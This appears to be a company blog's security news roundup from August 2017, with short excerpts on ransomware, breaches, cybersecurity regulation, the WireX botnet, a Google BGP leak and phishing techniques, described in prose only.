IT Security News Blast 8-29-2017

When Becker County was hit with what appears to be a classic ransomware digital attack on its system last week, its backup system allowed it to ignore the ransom demand and restore its system, including its website, printers and internal system, basically within 24 hours. It took another day or two to get all the individual work stations up and running.

As scary as these examples are, the solution isn’t to stop seeking medical treatment. Patients can take some steps to protect their data and their privacy. One thing to do is a reference check on your insurer, hospital or health care provider by visiting the Office of Civil Rights’ list of providers that have experienced breaches, sometimes referred to as the “Wall of Shame.” Since July 1 alone, 35 breaches have been reported and are under investigation affecting more than 850,000 individuals.

The regulator set minimum cybersecurity standards for covered banks and financial institutions that aren’t “overly prescriptive,” so that companies can “match the relevant risks and keep pace with technological advances,” the rules say. However, data security attorneys and cybersecurity professionals told Bloomberg BNA that the rules are vague and lack clear compliance guidance, so they may actually hamper banks and financial institutions rather than help boost their security protections.

High-profile breaches like those that impacted HBO, Target and Home Depot are just three examples — but there are many others (too many to list for 2017 alone, and we still have roughly four-and-a-half months to go). As a result, we’re now seeing new regulations emerge that are forcing organizations to get their proverbial houses in order. These regulations feature a new characteristic: They’re hitting companies where it hurts, with steep penalties for those that don’t comply.

A California mortgage company is suing an insurer, claiming it refused coverage for a claim filed after a hacker stole more than $75,000 by impersonating the mortgage company’s former CEO. American Pacific Mortgage filed the lawsuit against Aspen Specialty Insurance Company in federal court, claiming the insurer must cover a claim resulting from the cyber attack.

Simply put, the regulation and other legislation to come will require insurance companies, brokers, and soon their lawyers, to change their management and corporate culture toward cybersecurity or face certain liability. For those insurers that conduct business in New York and have not yet taken action, time is running out. Here are five things that every insurance carrier, its general counsel and its board of directors should know about these new cybersecurity regulations.

Ship owners were warned about the threat of cyber-attacks only weeks before America began investigating the “possibility” that hackers caused the collision between one of its warships and an oil tanker, The Sunday Times can reveal. The International Maritime Organisation (IMO), a London-based UN-affiliated body that regulates shipping, last month published guidelines urging ship owners to safeguard vessels against the “current and emerging threats” of cyber-hacking.

Yu is accused of selling the Sakula malware that was used in the OPM attack. Sakula was at that time a very rare piece of malware indeed, which is just what you need to stay under the radar. Yu, a Chinese national from Shanghai, was apparently arrested at Los Angeles airport after attending a conference in the US.

In the weeks leading up to the Charlottesville, Virginia white nationalist march that left one counterprotestor dead, organizers discussed inserting screws into flagpoles to be used as potential weapons and concealing firearms in the case of a “gunfight,” according to chatroom logs. In the days after the march, participants in the same chatroom created a meme from a photo of a car that struck and killed Heather Heyer, describing the incident as “Back to the Fhurer.”

Several members of the National Infrastructure Advisory Council (NIAC), a Homeland Security advisory body, resigned last week. An unsigned resignation letter obtained by Nextgov gives several reasons for the resignation, including the Trump administration’s lack of attentiveness to critical infrastructure and President Trump’s recent comments in the wake of unrest in Charlottesville. […] A majority of security analysts say the US is likely to suffer a cyberattack targeting infrastructure in the next two years, making the NIAC’s role a critical one. Eight members of the 28-member council resigned last week, which should be enough to make any security professional concerned for the security of US infrastructure.

A few years into my career, I still see myself as an oddball: I rock platinum blonde hair, write bad malware pick-up lines, secretly place unicorns throughout my error code to add some flair, and love graphic design just as much as coding. In the cybersecurity industry though, I fit right in. By becoming an expert in my field and exceeding expectations, I’ve pushed my peers to overlook my gender and solely respect my ability to do the work and get the job done. You see, behind the computer screen, your gender and superficial characteristics don’t matter. Hackers have no identity; they’re anonymous. It’s the work you produce that earns you respect among peers.

Women in cybersecurity: IBM wants to send you to a hacker conference for free

“Improving the diversity of the cybersecurity workforce is essential to overcoming the growing threats and challenges facing the industry – and supporting growth opportunities for women in this field is a critical part of that equation,” said Diane Delaney, worldwide talent manager at IBM Security, in a press release. “By providing scholarships at conferences like this, IBM hopes that more women will be encouraged to attend the event and stay up to speed on the latest trends and techniques which will help them become even more successful in the field.”

Security researchers at Moscow-based Positive Technologies have identified an undocumented configuration setting that disables Intel Management Engine 11, a CPU control mechanism that has been described as a security risk. […] If compromised, it becomes a backdoor, giving an attacker control over the affected device. That possibility set off alarms in May, with the disclosure of a vulnerability in Intel’s Active Management Technology, a firmware application that runs on the Intel ME.

It appears Apple has taken this sticky civil liberties situation into account in iOS 11, which features a new setting where tapping the power button five times brings up the option to make an emergency call, and disables Touch ID until the user enters their password. Discreet! And another potential front in the ongoing disputes between Apple and law enforcement, though we’ll have to wait at least until iOS 11’s official release this fall to see the full legal ramifications.

Under the scheme, up to three wirelessly connected heavy goods vehicles will move in a platoon, with acceleration and braking controlled by the lead vehicle. The lorries would still be steered by drivers. The report, commissioned by the Department for Transport, concludes that the system has the potential to reduce accidents and emissions, while improving traffic flow. But it also outlines 20 risks, including cyber-attack and the potential for drivers in the middle and back vehicles to lose concentration.

Businesses are increasingly transferring their data to cloud servers due to flexibility and cost savings, the report stated. The cloud security market includes products and solutions focused on the security of compliance, governance, and data protection. Cloud identity and access management tools were the most widely used, according to the report, accounting for the largest market share at $287.3 million. Email and web security came in second place, and these solutions have increased across many enterprises due to the rise of malware and ransomware in particular.

Commenting on the need for scalability and flexibility in your cybersecurity posture, “A cyberactor may be on somebody’s network for a year and a half without being detected,” Sowell says. “If you’re only keeping a month’s data, that’s a real problem.” Sowell explained AI’s role in understanding user activity on your network to detect anomlies and prevent data loss. Hortonworks has been actively working with the open source community on a cyber security framework, Apache Metron, that was designed to detect these anomalies at scale and that allows organization to quickly respond to threats.

A collaboration between leading content delivery networks and technology companies—some of them competitors—is in the midst of shutting down the largest botnet of mobile devices ever recorded. The WireX botnet was detected on Aug. 17 after businesses in a number industries, most notably hospitality, porn and gambling, as well as domain registrars, reported signs of substantial distributed denial of service attacks.

Last Friday, someone in Google fat-thumbed a border gateway protocol (BGP) advertisement and sent Japanese Internet traffic into a black hole. The trouble began when The Chocolate Factory “leaked” a big route table to Verizon, the result of which was traffic from Japanese giants like NTT and KDDI was sent to Google on the expectation it would be treated as transit. Since Google doesn’t provide transit services, as BGP Mon explains, that traffic either filled a link beyond its capacity, or hit an access control list, and disappeared.

Tech support scam victims lost $120 million—and will get $10 million back

The FTC later won big court judgments against the companies involved, but the defendants didn’t have enough money left to pay up. One monetary judgment of $29.5 million was suspended because of the defendants’ financial condition. But the FTC was able to recover $10 million in a December 2016 settlement with defendants including Inbound Call Experts, a company also known as Advanced Tech Support. A previous settlement with companies accused of generating leads for the telemarketers brought in $258,000.

The first method involves emails with an HTML attachment that contain a small excerpt of JavaScript that is obscured in hexadecimal escape characters. “Therefore, no links are visible, but when opened, it presents a locally-generated phishing page with login instructions,” the company explains in an Aug. 24 blog post. […] [The] attack that abuses SharePoint generally involves an email that leverages “a genuine invoice from a commonly used online site, with a publicly open link to Office 365 SharePoint,” which is a web-based, collaborative platform for Microsoft Office users. Clicking the link executes a JavaScript-based file that infects the endpoint.

Some pet shops are still reporting low stocks of Royal Canin after the company’s headquarters in France were attacked by hackers on June 27. […] Shortages have been reported across London and the Home Counties. At one pet shop in Sydenham, south London, customers were faced with a two-week wait for kitten food. It is understood that the hack on Royal Canin’s servers has also affected supplies of dog food. James Wellbeloved, which also makes pet food and is owned by Mars, is also thought to be affected.

Want more cybersecurity information?

We may also occasionally send you information about Critical Informatics products and solutions; you can unsubscribe at anytime if desired.Leave this field empty if you're human:

About Critical Informatics

We are world-class information security professionals providing Managed Detection and Response services to help you be secure, compliant, and resilient against threats to the life safety, life-sustaining, and quality-of-life systems and services you provide to clients, customers, constituents, and communities.